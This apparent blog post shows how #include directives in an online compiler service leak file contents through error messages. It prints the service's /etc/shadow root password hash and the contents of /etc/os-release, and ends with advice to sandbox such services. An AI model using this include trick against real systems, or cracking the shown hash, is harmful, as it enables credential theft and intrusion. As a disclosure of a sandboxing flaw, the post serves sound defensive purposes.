Last week I saw this tweet:
TIL that you can #include “/dev/stdin”
— Peter Alexander (@Poita_) 24 novembre 2019
$ cat in
“Hello, world!”
$ cat a.cpp#include <stdio.h>
int main() {
printf(“%s\n”,
#include “/dev/stdin”
);
return 0;
}
$ g++ a.cpp < in && ./a.out
Hello, world!
Which sparked a lot of interesting discussion and prompted me to try something in my favourite online compiler service:
#include </etc/shadow>
int main()
{
return 0;
}As you can see, the code tries to include /etc/shadow (and probably fails). The most important part is the error message when compiling:
In file included from 2:0:
/etc/shadow:1:5: error: found ':' in nested-name-specifier, expected '::'
root:$6$YSIy/1tm$t1TF6wAz9WEU86xKC47Z6T2EgSjGGW79N/bzAbNlOpkiUT9DQ3E1PltnmbMf2QMcQvjWpJZsshuNg4blhpdXL/:16538:0:99999:7:::
^
/etc/shadow:1:1: error: 'root' does not name a type
root:$6$YSIy/1tm$t1TF6wAz9WEU86xKC47Z6T2EgSjGGW79N/bzAbNlOpkiUT9DQ3E1PltnmbMf2QMcQvjWpJZsshuNg4blhpdXL/:16538:0:99999:7:::Nice, we have root privileges on the machine! You would still need to crack this password hash, though. In this specific case, the compiler is sandboxed, so we are probably in a virtualized environment. Let’s check:
#include </etc/os-release>
int main()
{
return 0;
}You can try other files to find out more about the system. This example yields the following result:
In file included from 2:0:
/etc/os-release:1:1: error: 'PRETTY_NAME' does not name a type
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"So, from a security perspective, always correctly sandbox your compiler services. Or better yet, never run anything with root privileges if it is accessible from the Internet.
Be First to Comment